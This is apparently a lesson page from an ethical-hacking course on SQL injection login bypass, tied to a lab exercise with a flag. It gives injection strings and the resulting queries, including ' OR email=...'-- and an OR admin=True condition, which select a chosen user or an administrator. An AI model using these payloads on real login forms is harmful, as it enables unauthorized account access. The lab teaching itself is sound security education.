In the last module, we learned how a programming error can lead to an attacker being able to modify the structure of the SQL queries made by the application.
We did an exercise where we bypassed the login by forcing the database to return all user rows regardless of the password, allowing the application to log us in as the first user, who happened to be the system administrator.
But what if we want to log in as a different user? In this case, we need to add conditions to the WHERE clause of the query, which instruct the database to return only the desired user instead of every user.
If we knew the administrator's email address, we could approach the problem, for example, by injecting ' OR email='admin@ha-target.com'-- resulting in SQL:
SELECT * FROM user WHERE email='diibadaabaduu@ha-target.com' AND password='foo' OR email='admin@ha-target.com'-- 'However, we do not know the administrator's email address. Instead, we know that there is a column named admin in the database that is in boolean format, meaning its value is True or False.
We should be able to log in as an administrator as long as we ensure that the query only returns rows where the value of the admin column is True. Try the practice below and try to get the application to execute a query like this.
SELECT * FROM user WHERE email='foo@ha-target.com' AND password='foo' OR admin=True-- 'MySQLi Login Bypass 2
In this lab, we dive a little deeper into SQL syntax, exploring the conditions of the WHERE clause with the aim of logging in as a specific individual instead of the first user.
Objective
Log in as a user whose value in the admin column is True.
Exercises
Flag
Find the flag from the lab environment and enter it below.
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.